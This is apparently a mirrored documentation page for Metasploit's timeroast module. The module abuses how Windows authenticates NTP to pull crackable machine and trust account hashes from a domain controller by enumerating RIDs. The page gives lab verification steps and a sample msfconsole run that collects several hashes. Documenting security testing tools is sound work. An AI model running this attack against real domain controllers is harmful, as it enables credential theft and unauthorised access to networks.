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GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/scanner/ntp/
Views: 16005

Vulnerable Application

Windows authenticates NTP requests by calculating the message digest using the NT hash followed by the first 48 bytes of the NTP message (all fields preceding the key ID). An attacker can abuse this to recover hashes that can be cracked offline for machine and trust accounts. The attacker must know the accounts RID, but because RIDs are sequential, they can easily be enumerated.

Verification Steps

  1. Setup a Windows domain controller target

  2. Start msfconsole

  3. Use the auxiliary/admin/dcerpc/samr_account module to create a new computer account with the ADD_COMPUTER action

    1. Note the RID (the last part of the SID) and password of the new account

  4. Use the auxiliary/scanner/ntp/timeroast module

  5. Set the RHOSTS option to the target domain controller

  6. Set the RIDS option to the RID of the new account

  7. Run the module and see that a hash is collected, this has will show up in the output of the creds command if a database is connected



The RIDs to enumerate (e.g. 1000-2000). Multiple values and ranges can be specified using a comma as a separator.


Windows 2019 x64 Domain Controller

msf6 auxiliary(scanner/ntp/timeroast) > set RIDS 4200-4205 RIDS => 4200-4205 msf6 auxiliary(scanner/ntp/timeroast) > set RHOSTS RHOSTS => msf6 auxiliary(scanner/ntp/timeroast) > run [*] Checking RID: 4200 [*] Checking RID: 4201 [+] Hash for RID: 4201 - 4201:$sntp-ms$74e3c4ac73afe868119ff98613888d48$1c0100e900000000000a2c704c4f434ceb0aaf8ac9813bd40000000000000000eb0aea216d99a558eb0aea216d99e010 [*] Checking RID: 4202 [+] Hash for RID: 4202 - 4202:$sntp-ms$e106388a43f6bbd5365e3a6f2dee741d$1c0100e900000000000a2c704c4f434ceb0aaf8ac78c5c9a0000000000000000eb0aea21bb83de46eb0aea21bb8442f0 [*] Checking RID: 4203 [*] Checking RID: 4204 [+] Hash for RID: 4204 - 4204:$sntp-ms$d0b1961cc3d57a1eaa40bfeeb9f30eb9$1c0100e900000000000a2c704c4f434ceb0aaf8ac653c2f50000000000000000eb0aea222a6c25c3eb0aea222a6c6a8c [*] Checking RID: 4205 [*] Waiting on 3 pending responses... [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/ntp/timeroast) >